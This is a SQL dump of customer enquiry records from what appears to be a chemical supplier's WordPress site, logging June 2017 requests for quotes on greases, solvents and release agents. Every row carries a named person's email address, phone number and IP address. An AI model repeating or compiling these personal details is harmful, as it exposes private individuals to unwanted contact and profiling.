INSERT INTO `wp_enquiry_detail_new` VALUES (1048, 'Charlie Wells', 'cwells@aerodyneng.com', 'I would like a quote and lead time for a quantity of 1 quart of Krytox GPL 103.  Thanks,\n\nCharlie Wells', '317413-7862', 'GPL 103', '50.200.165.130', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"438";s:5:"title";s:7:"GPL 103";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-08 18:17:59', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1049, 'Jean-Philippe', 'jp.bigue@exonetik.com', 'Hi, \n\nmy company is interested in purchasing some PFPE GPL 101. Could you please let us know what is the largest container you can provide (20 kg I believe), along with a quote?\n\nI would also like to know if you have wholesale options, or discounts, for higher volumes (e.g. 100 L +/ year). \n\nThank you, ', '819481-2317', 'GPL 101 quote', '70.28.34.23', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"436";s:5:"title";s:7:"GPL 101";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-gpl-oil-grease1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-08 20:36:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1050, 'Beng Yew', 'ooibengyew@yahoo.com.sg', 'Hi, can you send me the Safety Data Sheet because there is a certain requirements that my company are seeking for. ', '+6590281763', 'Question', '122.11.139.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1693";s:5:"title";s:39:"H0805A &#038; H0B05B Flux Remover Spray";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:80:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-09 03:21:26', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1051, 'Beng Yew', 'ooibengyew@yahoo.com.sg', 'Hi, I am looking for flux remover which has heavy duty cleaning feature and most importantly i need the Safety Data Sheet before purchasing it. Thanks!', '+6590281763', 'Question', '122.11.139.4', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1690";s:5:"title";s:20:"MS-755L Flux Remover";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:85:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-755l-flux-remover.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-09 03:54:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1052, 'Ashish ', 'ashish.bhale@gmail.com', 'Call me !!', '814917-0474', 'Krytox oil ', '49.248.204.183', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-09 07:39:19', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1053, 'Christopher Zoto', 'christopher.a.zoto.ctr@mail.mil', 'Good morning,\n\nI would like to please put in an inquiry requesting all the available sizes and pricing of Vertrel XF. If possible, does your company sell bulk sized volumes (i.e. pail sizes like 10 L or 5 gallons?) If so, can you please send me pricing inquiries for those two volumes? We use Vertrel regularly and we run through 1 L/1 QT sized containers fairly quickly. Thank you! Kindest regards, Chris Zoto', '1508-233-5084', 'Vertrel XF: Pricing Inquiries of Available Sizes', '131.92.145.166', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-09 11:58:25', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1054, 'Zayyan Chowdhury', 'zchowdhury@mschem.com', 'test', '', 'test', '198.0.163.158', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-09 17:58:15', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1055, 'vamshi krishna', 'kvamshi3@yahoo.in', 'Hi..\nwe want to purchase aeroduster ms-222n\nRequired quotation.\nplease send', '+919030392776', 'AeroDuster MS-222N', '111.93.22.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-10 10:12:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1056, 'Zoran', 'Zoran6089@gmail.com', 'Hallo, I am interested to buy a tube of this grease,what would be the Price? ', '519739-0069', '', '24.57.192.159', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"697";s:5:"title";s:7:"XHT-BDX";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_105938183.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-10 21:10:13', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1057, 'vamshi krishna', 'kvamshi3@yahoo.in', 'we want to purchase  AeroDuster® MS-222N.\nplease send us quotation.', '', ' AeroDuster® MS-222N', '111.93.22.58', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"489";s:5:"title";s:20:"AeroDuster® MS-222N";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/aero-dusters.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 06:59:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1058, 'Reecha Pandya', 'reecha.pandya@abbott.com', 'I am writing to request a quote for one quart of MS143XD sent to Hong Kong, China. Thank you!', '609454-9132', 'MS143XD Quote', '130.36.63.144', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"306";s:5:"title";s:38:"MS-143XD | Dry Film Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-143XD.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 12:55:08', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1059, 'Helen Carlin', 'helen.carlin@manchester.ac.uk', 'please can i have a price for the plastic, glass and metal cleaner \n\nThank you', '+4401614463146', 'Price enquiry', '130.88.233.248', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 13:37:21', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1060, 'David Canitz', 'david.canitz@hpLubricants.com', 'Looking for pricing for this product in 14 oz grease tube / cartridges.', '815944-7755', 'Pricing on GPL 223 H1 grease', '173.161.3.195', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"844";s:5:"title";s:7:"GPL 223";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_157239284.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 16:16:06', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1061, 'Christopher Macrae', 'christopher.p.macrae.civ@mail.mil', 'Good afternoon,\n\nCan you please provide a quote for 1 gal of Epon 828, either in 4x1Qt containers or 1x1gal container.  Also, do you have any carboy like packaging to facilitate dispensing, vs. the standard screw top bottles?\n\nThank you,\nChris', '973724-9439', 'RFQ - Picatinny Arsenal', '131.92.192.132', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"877";s:5:"title";s:11:"EPON™ 828";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:73:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/EPON-828.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 16:56:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1062, 'Scott Westerhuis', 'scott.westerhuis@npmedical.com', 'I am in need of 2, 2 oz tubes of grease. I was wonder as to a local distributor or can I order from the website? I am in Massachusetts.', '508769-4115', 'RFQ', '199.168.151.108', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"790";s:5:"title";s:7:"GPL 206";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_448241593.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 18:56:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1063, 'Hengji Huang', 'hengjih@andrew.cmu.edu', 'Hello, what is the price for 1 quart of ms-11? Thanks!', '412708-1044', 'price for 1 quart of ms-11', '128.237.198.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 20:33:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1064, 'Hengji Huang', 'hengjih@andrew.cmu.edu', 'Hello, what is the price for 1 quart of ms-11? Thanks!', '412708-1044', 'price for 1 quart of ms-11', '128.237.198.22', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 20:34:12', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1065, 'jjoswick', 'jjoswick@fastenal.com', 'Hello,\n\nI need to know if this part is REACH and RoHS compliant please.', '507313-7927', 'REACH/RoHS.MeTo', '108.171.131.163', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"789";s:5:"title";s:7:"GPL 205";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_329225291.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-12 20:41:11', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1066, 'Joseph Kirchhoff', 'Jglennk7@gmail.com', 'Would this product work well for molding with high temperature thermoplastics (700 degree Celsius) where were trying to melt the plastics between two pieces of metal? ', '919410-5883', 'Question', '76.211.116.125', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"308";s:5:"title";s:39:"MS-153 | High Temperature Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Boron-nitride.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-13 01:14:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1067, 'JOY YAMZON', 'joy.yamzon@creationtech.com', 'Hi,\n\nWe are introducing to use MS-460H to our plant for our Pentair product. Can you please send us a Safety Data Sheets for MS-460H Silicone Conformal Coating.\n\nThanks,\nJoy Yamzon\nCreationtion Technologies', '', 'Need Safety Data Sheets for MS-460H', '206.47.221.54', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"620";s:5:"title";s:7:"MS-460H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-460H.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-13 14:39:23', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1068, 'Matthew Delamere', 'matthew@eyeleveljetinteriors.com', 'Hello - my company supply private jets all over the world with cabin enhancements.  We would like to start selling your MS-260 to our client\'s for their aircraft. \n\nPlease can you email me the wholesale price per case for this product\n\nThank you\n\nMatthew\n\nwww.eyeleveljetinteriors.com', '+4401279215186', 'MS-260 Plastic glass and metal cleaner', '86.53.233.145', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1338";s:5:"title";s:42:"MS-260 Plastic, Glass &#038; Metal Cleaner";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/cleaner.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-13 16:18:28', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1069, 'Lena Hiller', 'lena.hiller@hofstra.edu', 'Would like to order one quart.', '516463-5564', 'Vertrel XF Cleaning Agent', '147.4.85.208', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-13 17:28:34', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1070, 'Brian Nguyen', 'brian.nguyen@arkema.com', 'I\'m Brian Nguyen, Sr. Lab Technician for Arkema Coating Resins. I\'m with the Powder Coatings R&amp;D group based at the following site: 901 E 16th Avenue, North Kansas City, MO 64116. We have been using the PTFE Release Agent MS-122AD and we need to replenish our stock.  Can I get quote for 10 cans of this product?  Once my lab manager clears the quote, we\'ll proceed with an order. Thanks!', '816283-1564', 'Quote for 10 Cans of MS-122AD (No Silicones)', '104.129.194.61', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:2:"10";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-13 17:30:38', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1071, 'Shaghayegh Shajari', 'shaghayegh.shajari@ucalgary.ca', 'Dear Sir or Madam \n\nI am a student at the University of Calgary. We want to buy the PTFE release agent for molds. \nHow much is the price? and how much will be plus shipping amount to Canada, Calgary?\n\nThank you so much \nI am looking forward to hearing from you \nShaghayegh ', '587969-4440', 'Price quotes', '136.159.118.221', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1677";s:5:"title";s:38:"MS-122AD | Dry Film PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/ms-122ad-dry-film-lubricant.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 00:09:04', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1072, 'Elise', 'Scootiebob@gmail.com', 'Hello', '', '', '70.211.11.27', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"993";s:5:"title";s:6:"XP 1A1";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:92:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/krytox-bearing-oil-grease-1.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 03:50:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1073, 'Bonnie Ray', 'bonnie.ray@sparton.com', 'PLEASE PROVIDE PRICING AND LEAD TIME FOR 1 (1 OR 4 OZ BOTTLE).  DO ANY OF YOUR DISTRIBUTORS STOCK THIS?  IS IT AVAILABLE AS A SAMPLE?', '603382-3840', 'MS-383H / MS-383', '50.199.203.36', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"3606";s:5:"title";s:7:"MS-383H";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2017/02/shutterstock_142198558.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 12:00:07', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1074, 'Kevin Mickley', 'kevin.mickley@ngc.com', 'I need a quote for a standard small use quantity of this item.  (1-5 gallon)  Thank you.', '801525-4742', 'Quote', '134.223.116.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1287";s:5:"title";s:4:"Sion";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/opteon-sion.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 14:31:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1075, 'RENE CATALA', 'OD@LOGUS.COM', 'Please quote price &amp; delivery\n1 can Thanks!', '561842-3550', 'RFQ FROM LOGUS MFG MS-4070C', '23.24.185.241', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"735";s:5:"title";s:7:"MS-470C";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:72:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-470C.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 14:46:02', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1076, 'John Crooks', 'jcrooks@wirelesslegacy.com', 'I am a tower contractor that periodically engages in tower foundation repairs.  \n\nWe frequently use Five Star Products Epoxy Fix.  We have had great success with the adhesion of the product to the intended repair surfaces.....and also to unintended surfaces.  \n\nWe are looking for a spray form mold release that can be used as a form release agent.', '608577-0160', 'Looking for mold release to be used with forming ', '64.91.64.153', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"182";s:5:"title";s:29:"MS-122AV | PTFE release agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Automotive.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 15:17:41', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1077, 'Ryan', 'ryan.ward@lmco.com', 'Would you please provide pricing info on the MS-222N &amp; the MS-242L.\n\nThank you,\nRyan\nLockheed Martin', '303977-3290', 'pricing', '192.35.35.36', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"2788";s:5:"title";s:27:"MS-242L Quik-Freeze® Ultra";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_444780952.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 15:35:32', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1078, 'Robert Daily', 'robert.daily01@comcast.net', 'Requesting price for MS-111.', '', 'RFQ for MS-111', '138.162.0.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1152";s:5:"title";s:28:"MS-111 Epoxy Stripping Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/MS-111-EPOXY-STRIPPING.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 15:57:48', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1079, 'Douglas Bodily', 'doug.bodily@orbotech.com', 'Need to know where GPL 200 may be purchased and size of tubes available ', '408360-3044', 'GPL-200', '12.163.76.42', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"347";s:5:"title";s:7:"GPL 200";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:87:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/shutterstock_153282266.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 16:11:54', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1080, 'Lisa Linz', 'lisa.linz@midwestcomposite.com', 'I am looking for a quote on a 5 gallon pail of the Vertrel SDG.  Depending on how we like it, more may be eventually ordered.', '262367-8254', 'RFQ Vertrel SDG', '74.62.101.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1268";s:5:"title";s:11:"Vertrel SDG";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:78:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-sdg-3.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 19:18:35', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1081, 'Karen Wade', 'kwade@aviorcontrols.com', 'Hello - I would like to get a quote for two gallons of your Vertrel XF along with a Certificate of Conformance.', '720491-3708', 'Vertrel XF', '50.78.202.6', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1278";s:5:"title";s:10:"Vertrel XF";s:5:"price";s:0:"";s:5:"quant";s:1:"2";s:3:"img";s:75:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/vertrel-xf.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 21:21:05', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1082, 'Jonathan Kopechek', 'jonathan.kopechek@louisville.edu', 'I would like a quote for Krytox 157 FSH. Thank you.', '502852-8205', 'Quote request for Krytox 157 FSH', '136.165.191.10', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"956";s:5:"title";s:7:"157 FSH";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:104:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/Chemours-Krytox-Group-Oil-Scale-300-dpi.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-14 23:01:37', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1083, 'Punit Badeka', 'punitmbadeka@gmail.com', 'Dear Sir / Madam,\n\nI would like to get the quote of Quik-Freeze MS-242N,1- Aerosol.\n\nThis will be my regular requirement.\nLooking forward to get the quote as soon as possible.\n\nThanks,\nPunit Badeka\nLVPEI, Hyderabad.', '+919406618009', 'Quotation', '220.227.249.172', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1719";s:5:"title";s:21:"Quik-Freeze® MS-242N";s:5:"price";s:0:"";s:5:"quant";s:3:"100";s:3:"img";s:76:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/quik-freeze.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 04:20:56', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1084, 'Jason Zand', 'jzand@surgisense.com', 'Hello,\n\nI am looking to purchase a can today.\n\nThanks,\n\nJason', '202800-8071', 'Pricing and Availability', '71.178.167.41', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:3:"302";s:5:"title";s:34:"MS-122SE | PTFE Mold Release Agent";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:83:"https://www.miller-stephenson.com/wp-content/uploads/2016/08/MS-122SE-Aerospace.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 06:30:20', '', NULL, '', '', '', NULL, '', ''); 
INSERT INTO `wp_enquiry_detail_new` VALUES (1085, 'Pavan P R', 'pavan.pr@adtl.co.in', 'Sir/Madam\nPlease quote your best price for\n 1. EPIkURE 3125 QTY: 16PI   \n2. ,HELOXY MODIFIER 71 QTY: 15PI  \n3. CAB-O-SIL-M5  QTY: 3kgs', '804255-6968', 'Quote required', '119.82.97.2', 'a:1:{i:0;a:1:{i:0;a:9:{s:2:"id";s:4:"1866";s:5:"title";s:15:"EPIKURE™ 3125";s:5:"price";s:0:"";s:5:"quant";s:1:"1";s:3:"img";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/09/EPIKURE-3125.jpg";s:6:"remark";s:0:"";s:3:"sku";s:0:"";s:12:"variation_id";s:0:"";s:9:"variation";s:0:"";}}}', '2017-06-15 07:35:56', '', NULL, '', '', '', NULL, '', ''); 
